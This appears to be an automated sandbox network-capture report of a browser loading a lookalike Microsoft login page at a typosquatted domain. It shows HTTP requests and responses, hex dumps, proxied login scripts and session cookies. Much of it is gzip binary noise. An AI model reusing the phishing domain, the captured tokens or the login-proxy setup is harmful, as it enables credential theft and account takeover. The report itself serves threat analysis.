                                                                                                                              2024-10-04 13:11:10 UTC1369INData Raw: 74 5c 75 30 30 32 36 72 65 73 70 6f 6e 73 65 5f 74 79 70 65 3d 63 6f 64 65 2b 69 64 5f 74 6f 6b 65 6e 5c 75 30 30 32 36 73 63 6f 70 65 3d 6f 70 65 6e 69 64 2b 70 72 6f 66 69 6c 65 2b 68 74 74 70 73 25 33 61 25 32 66 25 32 66 77 77 77 2e 66 74 6c 69 76 65 64 6f 63 73 2e 74 65 63 68 25 32 66 76 32 25 32 66 4f 66 66 69 63 65 48 6f 6d 65 2e 41 6c 6c 5c 75 30 30 32 36 73 74 61 74 65 3d 4b 58 6f 75 4e 54 33 44 43 43 34 6e 4a 47 6d 5a 30 55 50 71 72 34 33 44 76 4f 45 54 51 63 4d 4f 48 7a 79 57 33 58 4b 57 5f 47 6d 6d 53 53 50 31 76 68 64 62 75 77 35 58 41 53 67 71 4a 37 39 48 45 54 69 36 4a 77 68 48 4a 36 51 57 42 4b 77 42 4d 79 30 32 54 55 49 77 48 50 42 33 70 64 36 43 4b 59 47 5f 59 57 71 78 39 6b 50 68 79 42 65 7a 6f 7a 6b 46 49 31 68 68 66 31 44 77 4e 41 4d
                                                                                                                              Data Ascii: t\u0026response_type=code+id_token\u0026scope=openid+profile+https%3a%2f%2fwww.ftlivedocs.tech%2fv2%2fOfficeHome.All\u0026state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAM
                                                                                                                              2024-10-04 13:11:10 UTC1369INData Raw: 30 38 35 33 38 2d 64 66 66 35 2d 34 30 37 64 2d 62 65 36 38 2d 38 31 39 30 33 33 30 33 33 61 37 61 22 2c 22 69 77 61 49 46 72 61 6d 65 55 72 6c 46 6f 72 6d 61 74 22 3a 22 68 74 74 70 73 3a 2f 2f 61 75 74 6f 6c 6f 67 6f 6e 2e 6d 69 63 72 6f 73 6f 66 74 61 7a 75 72 65 61 64 2d 73 73 6f 2e 63 6f 6d 2f 7b 30 7d 2f 77 69 6e 61 75 74 68 2f 69 66 72 61 6d 65 3f 63 6c 69 65 6e 74 2d 72 65 71 75 65 73 74 2d 69 64 3d 33 37 61 30 38 35 33 38 2d 64 66 66 35 2d 34 30 37 64 2d 62 65 36 38 2d 38 31 39 30 33 33 30 33 33 61 37 61 5c 75 30 30 32 36 69 73 41 64 61 6c 52 65 71 75 65 73 74 3d 46 61 6c 73 65 22 2c 22 69 77 61 52 65 71 75 65 73 74 54 69 6d 65 6f 75 74 49 6e 4d 73 22 3a 31 30 30 30 30 2c 22 73 74 61 72 74 44 65 73 6b 74 6f 70 53 73 6f 4f 6e 50 61 67 65 4c 6f 61
                                                                                                                              Data Ascii: 08538-dff5-407d-be68-819033033a7a","iwaIFrameUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/iframe?client-request-id=37a08538-dff5-407d-be68-819033033a7a\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoa
                                                                                                                              2024-10-04 13:11:10 UTC1369INData Raw: 46 63 50 51 38 6d 5f 4a 54 58 37 65 6b 30 33 75 59 76 74 51 79 4e 79 4e 33 49 6e 4f 32 39 61 73 72 69 41 42 43 31 34 37 78 36 68 30 48 6b 71 48 6f 7a 36 6a 46 55 79 41 41 22 2c 22 63 61 6e 61 72 79 22 3a 22 45 64 48 74 65 67 5a 52 56 67 70 53 5a 31 7a 2f 58 36 4c 4f 62 54 49 48 6f 4c 59 57 35 30 43 67 73 50 77 56 6d 79 34 57 52 58 49 3d 32 3a 31 3a 43 41 4e 41 52 59 3a 53 47 35 49 56 43 35 4e 4b 39 61 2b 70 30 2f 55 75 2f 32 2f 36 33 2b 4d 36 63 59 6b 6c 44 6e 2b 33 6a 44 7a 55 56 6c 4c 71 2f 59 3d 22 2c 22 73 43 61 6e 61 72 79 54 6f 6b 65 6e 4e 61 6d 65 22 3a 22 63 61 6e 61 72 79 22 2c 22 66 53 6b 69 70 52 65 6e 64 65 72 69 6e 67 4e 65 77 43 61 6e 61 72 79 54 6f 6b 65 6e 22 3a 66 61 6c 73 65 2c 22 66 45 6e 61 62 6c 65 4e 65 77 43 73 72 66 50 72 6f 74 65
                                                                                                                              Data Ascii: FcPQ8m_JTX7ek03uYvtQyNyN3InO29asriABC147x6h0HkqHoz6jFUyAA","canary":"EdHtegZRVgpSZ1z/X6LObTIHoLYW50CgsPwVmy4WRXI=2:1:CANARY:SG5IVC5NK9a+p0/Uu/2/63+M6cYklDn+3jDzUVlLq/Y=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProte
                                                                                                                              2024-10-04 13:11:10 UTC1369INData Raw: 61 67 62 30 30 39 6b 34 64 32 30 6c 67 32 2e 6a 73 22 2c 22 72 65 73 65 74 45 72 72 6f 72 50 65 72 69 6f 64 22 3a 35 2c 22 6d 61 78 43 6f 72 73 45 72 72 6f 72 73 22 3a 2d 31 2c 22 6d 61 78 49 6e 6a 65 63 74 45 72 72 6f 72 73 22 3a 35 2c 22 6d 61 78 45 72 72 6f 72 73 22 3a 31 30 2c 22 6d 61 78 54 6f 74 61 6c 45 72 72 6f 72 73 22 3a 33 2c 22 65 78 70 53 72 63 73 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 6c 30 67 69 6e 2d 6d 69 63 72 6f 73 6f 2e 66 74 6c 69 76 65 64 6f 63 73 2e 74 65 63 68 22 2c 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 66 74 61 75 74 68 2e 6e 65 74 2f 22 2c 22 2e 6c 30 67 69 6e 2d 6d 69 63 72 6f 73 6f 2e 66 74 6c 69 76 65 64 6f 63 73 2e 74 65 63 68
                                                                                                                              Data Ascii: agb009k4d20lg2.js","resetErrorPeriod":5,"maxCorsErrors":-1,"maxInjectErrors":5,"maxErrors":10,"maxTotalErrors":3,"expSrcs":["https://l0gin-microso.ftlivedocs.tech","https://aadcdn.msauth.net/","https://aadcdn.msftauth.net/",".l0gin-microso.ftlivedocs.tech
                                                                                                                              2024-10-04 13:11:10 UTC1369INData Raw: 65 6c 65 6d 65 74 72 79 22 3a 7b 22 74 79 70 65 22 3a 22 43 68 72 6f 6d 65 53 73 6f 54 65 6c 65 6d 65 74 72 79 22 2c 22 6e 6f 6e 63 65 22 3a 22 41 77 41 42 44 77 45 41 41 41 41 44 41 4f 7a 5f 42 51 44 30 5f 37 43 34 41 5f 67 57 6c 69 63 7a 54 57 69 6b 4b 42 51 50 75 49 75 38 67 51 63 4e 66 51 6b 43 5f 32 64 33 4f 6d 33 30 58 48 4d 31 48 6d 30 57 6d 46 4b 5a 49 59 43 58 4f 34 37 4d 52 68 63 39 62 65 65 72 77 6c 74 79 51 50 2d 2d 44 45 2d 54 6d 6f 58 49 68 67 35 5f 38 76 70 36 2d 36 78 6e 56 4c 4d 69 76 67 54 54 2d 56 41 66 49 41 41 22 2c 22 72 65 70 6f 72 74 53 74 61 74 65 73 22 3a 5b 5d 7d 2c 22 72 65 64 69 72 65 63 74 45 6e 64 53 74 61 74 65 73 22 3a 5b 22 65 6e 64 22 5d 2c 22 63 6f 6f 6b 69 65 4e 61 6d 65 73 22 3a 7b 22 61 61 64 53 73 6f 22 3a 22 41 41
                                                                                                                              Data Ascii: elemetry":{"type":"ChromeSsoTelemetry","nonce":"AwABDwEAAAADAOz_BQD0_7C4A_gWliczTWikKBQPuIu8gQcNfQkC_2d3Om30XHM1Hm0WmFKZIYCXO47MRhc9beerwltyQP--DE-TmoXIhg5_8vp6-6xnVLMivgTT-VAfIAA","reportStates":[]},"redirectEndStates":["end"],"cookieNames":{"aadSso":"AA
                                                                                                                              2024-10-04 13:11:10 UTC1369INData Raw: 65 29 29 7d 7d 76 61 72 20 73 3d 6f 2e 72 26 26 6f 2e 72 5b 65 5d 3b 72 65 74 75 72 6e 20 72 3d 72 7c 7c 74 68 69 73 2c 73 26 26 28 73 2e 73 6b 69 70 54 69 6d 65 6f 75 74 3f 61 28 29 3a 6e 2e 73 65 74 54 69 6d 65 6f 75 74 28 61 2c 30 29 29 2c 73 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 65 2c 72 3f 31 3a 30 29 7d 76 61 72 20 6e 3d 77 69 6e 64 6f 77 3b 6e 2e 24 44 6f 7c 7c 28 6e 2e 24 44 6f 3d 7b 22 71 22 3a 5b 5d 2c 22 72 22 3a 5b 5d 2c 22 72 65 6d 6f 76 65 49 74 65 6d 73 22 3a 5b 5d 2c 22 6c 6f 63 6b 22 3a 30 2c 22 6f 22 3a 5b 5d 7d 29 3b 76 61 72 20 6f 3d 6e 2e 24 44 6f 3b 6f 2e 77 68 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 66 75 6e
                                                                                                                              Data Ascii: e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){fun
                                                                                                                              2024-10-04 13:11:10 UTC1369INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6f 2c 21 31 29 2c 65 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 72 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 28 72 2e 64 65 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 6f 29 2c 65 2e 64 65 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 29 7d 76 61 72 20 61 3d 21 31 2c 73 3d 21 31 3b 69 66 28 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 72 2e 72 65 61 64 79 53 74 61 74 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 73 65 74 54 69 6d 65 6f 75 74 28 6e 29 7d 21 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 72 2e 61 64 64 45 76 65 6e 74 4c
                                                                                                                              Data Ascii: "DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventL
                                                                                                                              2024-10-04 13:11:10 UTC1369INData Raw: 73 3b 74 72 79 7b 69 3d 65 2e 73 68 65 65 74 2c 61 3d 69 26 26 69 2e 63 73 73 52 75 6c 65 73 2c 73 3d 21 31 7d 63 61 74 63 68 28 65 29 7b 73 3d 21 30 7d 69 66 28 69 26 26 21 61 26 26 73 29 7b 72 65 74 75 72 6e 21 30 7d 0a 69 66 28 69 26 26 61 26 26 30 3d 3d 3d 61 2e 6c 65 6e 67 74 68 29 7b 72 65 74 75 72 6e 21 30 7d 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 67 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 72 2c 74 2c 6e 29 7b 76 61 72 20 75 3d 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 75 3d 6f 28 65 29 3f 69 28 65 29 3a 22 73 63 72 69 70 74 22 3d 3d 3d 6e 2e
                                                                                                                              Data Ascii: s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.
                                                                                                                              2024-10-04 13:11:10 UTC1369INData Raw: 61 5d 2e 6c 65 6e 67 74 68 29 7d 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 2c 6f 29 7b 69 66 28 72 28 22 5b 24 4c 6f 61 64 65 72 5d 3a 20 22 2b 28 77 2e 66 61 69 6c 4d 65 73 73 61 67 65 7c 7c 22 46 61 69 6c 65 64 22 29 2c 6f 29 2c 45 5b 65 5d 2e 72 65 74 72 79 3c 79 29 7b 72 65 74 75 72 6e 20 45 5b 65 5d 2e 72 65 74 72 79 2b 2b 2c 76 28 65 2c 74 2c 6e 29 2c 76 6f 69 64 20 63 2e 5f 52 65 70 6f 72 74 46 61 69 6c 75 72 65 28 45 5b 65 5d 2e 72 65 74 72 79 2c 45 5b 65 5d 2e 73 72 63 50 61 74 68 29 7d 6e 26 26 6e 28 29 7d 0a 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 2c 6e 2c 6f 29 7b 69 66 28 75 28 6f 29 29 7b 72 65 74 75 72 6e 20 66 28 65 2c 74 2c 6e 2c 6f 29 7d 72 28 22 5b 24 4c 6f 61 64 65 72 5d 3a 20 22 2b 28 77 2e 73 75
                                                                                                                              Data Ascii: a].length)}}return r}function f(e,t,n,o){if(r("[$Loader]: "+(w.failMessage||"Failed"),o),E[e].retry<y){return E[e].retry++,v(e,t,n),void c._ReportFailure(E[e].retry,E[e].srcPath)}n&&n()}function h(e,t,n,o){if(u(o)){return f(e,t,n,o)}r("[$Loader]: "+(w.su


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              40192.168.2.174981013.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:11 UTC641OUTGET /shared/1.0/content/js/BssoInterrupt_Core_JQnUxWSvwsd9FrpspQmznw2.js HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Origin: https://l0gin-microso.ftlivedocs.tech
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:11 UTC791INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:11 GMT
                                                                                                                              Content-Type: application/x-javascript
                                                                                                                              Content-Length: 49804
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Mon, 05 Aug 2024 15:32:28 GMT
                                                                                                                              ETag: 0x8DCB563D09FF90F
                                                                                                                              x-ms-request-id: e10fc963-b01e-001c-0ed7-109136000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131111Z-15767c5fc55852fxfeh7csa2dn0000000cg000000000ar40
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:11 UTC15593INData Raw: 1f 8b 08 00 00 00 00 00 04 00 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a e8 6e 66 80 30 04 66 66 17 58 2e 27 56 c0 dd c1 ce da 0e 34 13 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 c1 45 ef fc a2 d2 ff 58 b9 f8 7c 74 7e 50 39 83 b7 7f 54 4e fb 17 47 fb 87 3f 5e 0f 7e 14 ff bf b8 f7 e3 ca d8 9f 88 0a fc 0e dd 58 78 95 30 a8 84 51 c5 0f 46 61 34 0d 23 37 11 71 e5 01 fe 46 be 3b a9 8c a3 f0 a1 92 dc 8b ca 34 0a bf 88 51 12 57 26 7e 9c 40 a1 a1 98 84 4f 95 2a 54 17 79 95 33 37 4a 9e 2b 47 67 66 1d ea 17 50 9b 7f e7 07 50 7a 14 4e 9f e1 f9 3e a9 04 61 e2 8f 44 c5 0d 3c aa 6d 02 2f 41 2c 2a b3 c0 13 51 e5 e9 de 1f dd 57 4e fc 51 14 c6 e1 38 a9 44 62 24
                                                                                                                              Data Ascii: m[80OL;wnf0ffX.'V4r~=,JUT~l?EX|t~P9TNG?^~Xx0QFa4#7qF;4QW&~@O*Ty37J+GgfPPzN>aD<m/A,*QWNQ8Db$
                                                                                                                              2024-10-04 13:11:11 UTC16384INData Raw: 27 1c c8 cc 3b 47 70 68 d3 97 de 38 51 da 2b 6d ae c3 c3 92 66 30 2c c7 e2 0e a7 d6 2d 0d 94 23 88 9f 19 2d 1f 22 de b2 95 e2 e1 43 fe ba 22 db f8 db c7 de c7 bd 8f bb 46 5e a9 e2 79 8b bb 39 80 f2 13 69 1c da 46 ac bd 01 17 40 95 be ca 7a c8 5e 78 9e 4e f0 34 2a 49 07 20 d2 55 18 4e aa f9 a9 79 19 46 01 fd be 74 21 2c 48 25 ed 0b d8 5c e1 21 97 5b fb 1f fa e7 08 c5 f1 db 24 52 d4 24 94 ea 86 a0 ac 71 9b a5 70 df 6e 64 32 7d bb 49 7e 1c 3a 35 86 3a 0b bc 11 b9 bc 63 53 13 db b6 21 b2 17 b6 8c 6c 3a de c8 b0 48 30 1a 78 e1 93 b1 f2 84 d9 a0 da 32 3b 49 9d 0e a3 ba 0c c0 20 f1 60 44 0e bf e1 b1 1f 00 db 07 eb f8 0b 93 7a ee 80 51 71 65 d0 f1 46 c6 4d b5 e4 80 4a d1 c1 db 33 01 93 60 94 84 63 3e bb 8d 4e f6 d7 4e 72 4b bf 55 91 07 da 56 22 f5 25 bb 62 d4 f0
                                                                                                                              Data Ascii: ';Gph8Q+mf0,-#-"C"F^y9iF@z^xN4*I UNyFt!,H%\![$R$qpnd2}I~:5:cS!l:H0x2;I `DzQqeFMJ3`c>NNrKUV"%b
                                                                                                                              2024-10-04 13:11:11 UTC16384INData Raw: 4f f2 d1 5f e3 49 57 25 53 20 30 da 2c 5f 9e fb be 25 d9 53 ac e2 06 6d fc 67 4d 28 10 b5 f0 53 88 c0 7e 3e c3 5e b0 96 88 a4 6a 56 81 ac 3c e2 4c 74 3e 79 ed bb 38 fd f9 09 7e 74 9f 32 42 c7 41 04 97 ac e7 a6 59 52 fe 59 8b 9a b4 f3 4a 8b b4 d6 10 bd d9 0f af 84 78 1b c9 34 c0 e1 99 a8 cd 23 a0 ce 8d b4 0e 00 99 43 46 38 aa 5e e1 a4 f2 b1 1e 2b 7f d5 16 32 3e 8d f2 99 ec b5 f7 ea 3d de 6a 55 6b ab 45 a6 da 10 6c 86 da dd 41 0a 35 3a 57 9c 6d af f8 17 dd 86 fe 9a 8f 67 27 ed 3a 5b 96 b7 fe 68 25 95 d8 2b b0 d4 b5 c8 c6 c9 ae 2d 62 2a 76 b4 6a a4 5b 48 7c 83 75 29 d5 f1 80 c1 6d 15 f3 46 e2 9d 67 bd 75 10 d5 0f fa 52 85 d6 65 ac 67 bd 66 c1 72 a4 33 6d ea 5c 99 93 86 6e a9 fd 34 e0 24 b4 0d 56 b1 61 56 94 05 d2 f1 9b 06 fa d6 bf 56 69 91 4c 38 d2 41 5f b8
                                                                                                                              Data Ascii: O_IW%S 0,_%SmgM(S~>^jV<Lt>y8~t2BAYRYJx4#CF8^+2>=jUkElA5:Wmg':[h%+-b*vj[H|u)mFguRegfr3m\n4$VaVViL8A_
                                                                                                                              2024-10-04 13:11:11 UTC1443INData Raw: 0e d0 f4 68 6c d8 37 44 70 d3 c6 9c 6a 8d 33 2e 82 62 3b 12 9c f1 56 32 89 89 b7 1c f8 4d 92 80 1d 13 a3 81 6b 0f 74 b0 f6 84 70 e9 e9 2c 49 af 92 78 a0 74 57 ec ad 25 df 18 38 c3 d4 53 29 e6 ae 8e 8b 93 b1 d2 56 e2 b7 bf 85 b6 94 6e 6e da cf 4a 54 d6 75 6d ac a3 fc 6d 23 e6 09 04 32 6d 06 4d 28 cf 16 35 28 24 8a d7 e3 11 0c 87 53 1f 83 11 24 c4 fc c3 89 41 42 39 c4 98 16 56 9e 4f 6d b3 c6 ef 84 26 af d9 dd a3 84 63 8c fa 7b eb 2a bd af dc 00 b7 88 03 05 8e ec fa fd 82 bd 9f 8c 0b 40 5f cc ab 16 c9 2c 13 c1 24 45 9b f2 c5 95 32 0f ac 16 0c f7 e9 05 a9 ed 10 12 2b 87 10 71 c9 25 6e 4c d0 b4 d8 26 e3 b3 13 af d7 74 bb 7d 5f d3 95 83 db 5b 37 ea 39 ca bb f7 00 bc c7 7d 71 70 80 36 07 87 17 11 46 47 79 ad 8b 01 fd 00 09 4b 55 8e 3a 38 8f 1e 84 6f dd b5 0c 51
                                                                                                                              Data Ascii: hl7Dpj3.b;V2Mktp,IxtW%8S)VnnJTumm#2mM(5($S$AB9VOm&c{*@_,$E2+q%nL&t}_[79}qp6FGyKU:8oQ


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              41192.168.2.1749813104.26.12.694432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:12 UTC3430OUTGET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true HTTP/1.1
                                                                                                                              Host: l0gin-microso.ftlivedocs.tech
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5; x-ms-gateway-slice=estsfd; fpc=AiTvsUNzDMhLtivCMH0SOIk; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe6JSh8XySIX2JZIyDEcAnTGHJW7xDRybzTrnJSMuljy1faq4uekBlYW6QepUzkeCCVeoETYsf77cKfqUAaCR3HLP0IdxhCl6lLOWFylALBPap_5Jy1OH6KOB0tgqhPeFvx9h3RpcXxRAQOONMX0l8end4UyP-YrFmgiLM0lyRyksgAA; stsservicecookie=estsfd; MUID=0572C4040C3160E33E86D10A0D3661F9; esctx-hafTsFBjF8Q=AQABCQEAAADW6jl31mB3T7ugrWTT8pFe5TybCsSosJF9LjgYSDC14al1AqasXUpYtR6kaTzvEFKyuSjcYMOS1IuHvaikexuBqdlXTeg9a_4OR4CLSyJFMR1qSPhUBZ2Gwd [TRUNCATED]
                                                                                                                              2024-10-04 13:11:12 UTC1308INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:12 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              Expires: -1
                                                                                                                              Link: <https://aadcdn.msauth.net>; rel=preconnect; crossorigin,<https://aadcdn.msauth.net>; rel=dns-prefetch,<https://aadcdn.msftauth.net>; rel=dns-prefetch
                                                                                                                              Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                              P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Pragma: no-cache
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+bno"}]}
                                                                                                                              Set-Cookie: buid=0.AS4AMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeLnLxYlcLN0uiecdI8FnulgzbT2s2w2dZLWnMrcz4DuNd9iCk5HEENuVvzncBUBn8hWzq4s-nrOe-_HV_-U_31msZFCEBg1NrPO_MW4tItXMgAA; Path=/; Expires=Sun, 03 Nov 2024 13:11:12 GMT; HttpOnly; Secure; SameSite=None
